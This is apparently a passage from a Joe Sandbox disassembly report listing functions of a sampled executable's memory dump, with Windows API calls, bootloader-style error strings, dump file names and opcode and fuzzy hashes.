Instruction Fuzzy Hash: 35E1D260A0EB03A1FA55BF14A850175A3B5AFCA791BDCA431C80E06365FF7CF54893B2

Function 00007FF759956BF0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 113COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF759956C2C

Part of subcall function 00007FF759951CB0: GetLastError.KERNEL32(?,?,00000000,00007FF759956904,?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF759951CD7

Strings

Failed to encode filename as ANSI., xrefs: 00007FF759956D45
Failed to get ANSI buffer size., xrefs: 00007FF759956CED
WideCharToMultiByte, xrefs: 00007FF759956D4C
win32_wcs_to_mbs, xrefs: 00007FF759956D0B
Failed to get wchar_t buffer size., xrefs: 00007FF759956C39
win32_utils_from_utf8, xrefs: 00007FF759956C69
Failed to decode wchar_t from UTF-8, xrefs: 00007FF759956CA6
Out of memory., xrefs: 00007FF759956C70, 00007FF759956D12
MultiByteToWideChar, xrefs: 00007FF759956C40, 00007FF759956CAD

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: Failed to decode wchar_t from UTF-8$Failed to encode filename as ANSI.$Failed to get ANSI buffer size.$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$WideCharToMultiByte$win32_utils_from_utf8$win32_wcs_to_mbs
API String ID: 203985260-1562484376
Opcode ID: 3649c6f93bb09270b823ff22ec7b0eec6d42e79460650eefbf3c7b929506c9f8
Instruction ID: ab6a165b73fed37d4da0446cde5bae4812d52decb35fb8af4c2e17ffbac055e5
Opcode Fuzzy Hash: 3649c6f93bb09270b823ff22ec7b0eec6d42e79460650eefbf3c7b929506c9f8
Instruction Fuzzy Hash: 9F417F61A0CA8292E620BF21EC4007AE6B1BFD5BD0FDC4535E94E47BA5EF3CE5418760

Function 00007FF75995F5C8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995F608
_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995F9D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995FC6F

Strings

p, xrefs: 00007FF75995F6AD
f, xrefs: 00007FF75995F6A0
f, xrefs: 00007FF75995F70A
f, xrefs: 00007FF75995F855
p, xrefs: 00007FF75995F712

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 5b8d5396a44c552a0cc4e48ad8092be8cf806d396b8c8f6251230df5f0eb9214
Instruction ID: bf8765ecd3201d8e318ec02d2a3ab87e35bbb764b3d0073f8e42b80c27b444ef
Opcode Fuzzy Hash: 5b8d5396a44c552a0cc4e48ad8092be8cf806d396b8c8f6251230df5f0eb9214
Instruction Fuzzy Hash: 4B126062A0C543A6FB20BE15E0647BBF675EFC0764FDC4036E699466C8DB7CE5808B21

Function 00007FF7599512B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF759951312
fseek, xrefs: 00007FF759951319
fread, xrefs: 00007FF7599513E9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7599512E2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7599513E2
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF75995134C
malloc, xrefs: 00007FF759951353

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID:
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 0-3659356012
Opcode ID: 27849c73a2b453c9c71bd8b325d1811199276ab163fc5dd860d9c84c8935c1af
Instruction ID: 051823fea10bd3e4a084e13e875771eadda11b5dc424cebd1252aa4048aafb8b
Opcode Fuzzy Hash: 27849c73a2b453c9c71bd8b325d1811199276ab163fc5dd860d9c84c8935c1af
Instruction Fuzzy Hash: BC416D21A49642A2EA24FF11E9502BAE3B0EF857D4FC84432DE4D47A55FF3DE582C320

Function 00007FF75995CF90 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF75995CFED

Part of subcall function 00007FF75995DF00: __GetUnwindTryBlock.LIBCMT ref: 00007FF75995DF43
Part of subcall function 00007FF75995DF00: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF75995DF68

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF75995D0C5
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF75995D31A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF75995D426

Strings

csm, xrefs: 00007FF75995D06E
csm, xrefs: 00007FF75995D0E8
csm, xrefs: 00007FF75995D007

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: c9717f7599358984fa081211ebe6d8e8a7f2fe77f13a54a703b9fcdffbee59eb
Instruction ID: 66fedcd500d899ab057a99dd6765b54bb91a8d581f9e41e4120d38cf2ad535ae
Opcode Fuzzy Hash: c9717f7599358984fa081211ebe6d8e8a7f2fe77f13a54a703b9fcdffbee59eb
Instruction Fuzzy Hash: C3E19D32A087419AEB20AF65D4402AEB7B0FFC4798F880135EE8D57B95DF38E481C760

Function 00007FF7599567C0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF75995685F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF7599568AF

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF7599568D8
WideCharToMultiByte, xrefs: 00007FF7599568F8
win32_utils_to_utf8, xrefs: 00007FF7599568E8
Failed to get UTF-8 buffer size., xrefs: 00007FF7599568F1
Out of memory., xrefs: 00007FF7599568E1

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 8d77172852237fffccb974c6d54fb7d37946d1ed41806d5f964de7f541550d5e
Instruction ID: 404b57a83313ceea3af3414dd2a95d46fcb0469a417f2dd45eae8682b876ce26
Opcode Fuzzy Hash: 8d77172852237fffccb974c6d54fb7d37946d1ed41806d5f964de7f541550d5e
Instruction Fuzzy Hash: DB415C32A09B8292E720AF15F84016AE7B4FFD5B94F984135DA8D47B98EF3CE456C710

Function 00007FF759956EC0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00007FF759952D35,?,?,?,?,?,?), ref: 00007FF759956F01

Part of subcall function 00007FF759951CB0: GetLastError.KERNEL32(?,?,00000000,00007FF759956904,?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF759951CD7

WideCharToMultiByte.KERNEL32(00000000,00007FF759952D35,?,?,?,?,?,?), ref: 00007FF759956F75

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF759956F7F
WideCharToMultiByte, xrefs: 00007FF759956F15, 00007FF759956F86
win32_utils_to_utf8, xrefs: 00007FF759956F42
Failed to get UTF-8 buffer size., xrefs: 00007FF759956F0E
Out of memory., xrefs: 00007FF759956F3B

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 1717984340-27947307
Opcode ID: d869b65ad41923ea885775a182ffbbb4fa8a6a55f9429b012359a23964d7bd56
Instruction ID: 79d662c6afe667fa06932b71a999c62dd887ace7070b54cb4857f4ae922ded96
Opcode Fuzzy Hash: d869b65ad41923ea885775a182ffbbb4fa8a6a55f9429b012359a23964d7bd56
Instruction Fuzzy Hash: 28215C71A09B4296EB20AF16E84006AF7B1AFC5B90FDC4535DA4D837A4EF3CE5558350

Function 00007FF7599693C4 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759969407
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7599697F4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF759969A90

Strings

f, xrefs: 00007FF759969529
p, xrefs: 00007FF7599694B9
p, xrefs: 00007FF759969531

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: d478605e8072a694eb9a9d804e4987f1596106984b5661be3eee2fb972e34d58
Instruction ID: a7d3f5254d079c317421bc823ea65c69f98a04cd7379ab7f5b837586cecc9e0a
Opcode Fuzzy Hash: d478605e8072a694eb9a9d804e4987f1596106984b5661be3eee2fb972e34d58
Instruction Fuzzy Hash: 46126062E0C2C386FB24BE15D1542B9F6B5EBC1754FDC4136E6994B6C8DB3DE5808B20

Function 00007FF759956FB0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF759957045
MultiByteToWideChar.KERNEL32 ref: 00007FF759957087

Strings

Failed to get wchar_t buffer size., xrefs: 00007FF7599570C6
win32_utils_from_utf8, xrefs: 00007FF7599570BD
Failed to decode wchar_t from UTF-8, xrefs: 00007FF7599570AD
Out of memory., xrefs: 00007FF7599570B6
MultiByteToWideChar, xrefs: 00007FF7599570CD

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 626452242-876015163
Opcode ID: 9e091cbaac830d0070f3842cc1d5ec76c8d2d2f90cb19691d00490de1532936c
Instruction ID: c9722ffeb002f7074de5b568e9b0a15666b1f0a7bacf540e4265e04212cef58d
Opcode Fuzzy Hash: 9e091cbaac830d0070f3842cc1d5ec76c8d2d2f90cb19691d00490de1532936c
Instruction Fuzzy Hash: 9D419232A08B4292EA10EF25A88016AE7B5FFD5790F9C4135EE8D47BA4EF3CD552C710

Function 00007FF75995C248 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF75995C4FA,?,?,?,00007FF75995C1EC,?,?,00000001,00007FF75995BE09), ref: 00007FF75995C2CD
GetLastError.KERNEL32(?,?,?,00007FF75995C4FA,?,?,?,00007FF75995C1EC,?,?,00000001,00007FF75995BE09), ref: 00007FF75995C2DB
LoadLibraryExW.KERNEL32(?,?,?,00007FF75995C4FA,?,?,?,00007FF75995C1EC,?,?,00000001,00007FF75995BE09), ref: 00007FF75995C305
FreeLibrary.KERNEL32(?,?,?,00007FF75995C4FA,?,?,?,00007FF75995C1EC,?,?,00000001,00007FF75995BE09), ref: 00007FF75995C34B
GetProcAddress.KERNEL32(?,?,?,00007FF75995C4FA,?,?,?,00007FF75995C1EC,?,?,00000001,00007FF75995BE09), ref: 00007FF75995C357

Strings

api-ms-, xrefs: 00007FF75995C2ED

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 9ce77a0163c425c367fd7c26c9c82fe5a817cd2dfec158d19dd861a4531b58f3
Instruction ID: 2a1cc7c729acc5e73cd31a608c28a9aa83c2a06f2f09a651641b97e76e7e80ba
Opcode Fuzzy Hash: 9ce77a0163c425c367fd7c26c9c82fe5a817cd2dfec158d19dd861a4531b58f3
Instruction Fuzzy Hash: 5F31B221A0B646A1EE51AF02A40157AA3F4FF89BA0F9D0535DD1D4A344FF3CE0448774

Function 00007FF7599555E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF759956DB0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956DEA

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF75995592F,?,00000000,?,TokenIntegrityLevel), ref: 00007FF75995563F

Strings

LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF759955653
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF75995569A
LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF759955616

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 2001182103-3498232454
Opcode ID: aa564683267f47d688a8517bb88a9b0a9054f6e1f4b3a9048b672f302df95511
Instruction ID: 3cb9fbe9b6f211e683f140c8925d90e0d43c31c070ffd2996cf5baf2074c6bc5
Opcode Fuzzy Hash: aa564683267f47d688a8517bb88a9b0a9054f6e1f4b3a9048b672f302df95511
Instruction Fuzzy Hash: 69317251B1A7C2A1FB24BF21E9552BBD2B1AFD97C0FCC0435DA4E42796EF2CE1048621

Function 00007FF759956DB0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956DEA

Part of subcall function 00007FF759951CB0: GetLastError.KERNEL32(?,?,00000000,00007FF759956904,?,?,?,?,?,?,?,?,?,?,?,00007FF759951023), ref: 00007FF759951CD7

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956E70

Strings

Failed to get wchar_t buffer size., xrefs: 00007FF759956DF7
win32_utils_from_utf8, xrefs: 00007FF759956E39
Failed to decode wchar_t from UTF-8, xrefs: 00007FF759956E7A
Out of memory., xrefs: 00007FF759956E32
MultiByteToWideChar, xrefs: 00007FF759956DFE, 00007FF759956E81

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 1717984340-876015163
Opcode ID: 7f54e5da8ee4cb54e1cd0e604769d215f15cea2374718bc11fd99751b49c0007
Instruction ID: 9cb90cc2ae8e2167cb96b898780beb04c46f683d9e38a82613ebeb95d3d23363
Opcode Fuzzy Hash: 7f54e5da8ee4cb54e1cd0e604769d215f15cea2374718bc11fd99751b49c0007
Instruction Fuzzy Hash: 59217121B08A4291EB10EF19F84016AE7B1BFD57C4F9C4131DB4C83BA9EF2DD5518710

Function 00007FF75996A780 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A78F
FlsGetValue.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A7A4
FlsSetValue.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A7C5
FlsSetValue.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A7F2
FlsSetValue.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A803
FlsSetValue.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A814
SetLastError.KERNEL32(?,?,?,00007FF7599724B3,?,?,?,00007FF75996CCEC,?,?,00000000,00007FF75996386F,?,?,?,00007FF759969473), ref: 00007FF75996A82F

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 69b8ad2768efc01d88fd7f8132853dff404c26667984aa111fd74584065afc1c
Instruction ID: 63296c48b8158c4b50c615ae588f20c1c020635857deda2d3a0c20cec44a37e4
Opcode Fuzzy Hash: 69b8ad2768efc01d88fd7f8132853dff404c26667984aa111fd74584065afc1c
Instruction Fuzzy Hash: 64212F20E0A68741FA587FA1E54117AE1765FC5BA0FEC4738D93E0BAD6DF2CB4414262

Function 00007FF7599770EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF75997711D
GetLastError.KERNEL32 ref: 00007FF759977129
CloseHandle.KERNEL32 ref: 00007FF759977141
CreateFileW.KERNEL32 ref: 00007FF75997716C
WriteConsoleW.KERNEL32 ref: 00007FF75997718B

Strings

CONOUT$, xrefs: 00007FF75997714D

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 900c1da012dee1dfb60ea43974335527b3f6c3b56b4e810762f126343bdfd55c
Instruction ID: 2432d6861692a13c4ca276290ac5df53bac845d99bbde50a7a5c03ab9e0d55d0
Opcode Fuzzy Hash: 900c1da012dee1dfb60ea43974335527b3f6c3b56b4e810762f126343bdfd55c
Instruction Fuzzy Hash: C0118E25A18A4186F350AF12E854329E2B4FBCABE4F8C0234EA1D87794CF3CD4448750

Function 00007FF75996A8F8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A907
FlsSetValue.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A93D
FlsSetValue.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A96A
FlsSetValue.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A97B
FlsSetValue.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A98C
SetLastError.KERNEL32(?,?,?,00007FF759966091,?,?,?,?,00007FF75996DF1F,?,?,00000000,00007FF75996AA16,?,?,?), ref: 00007FF75996A9A7

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
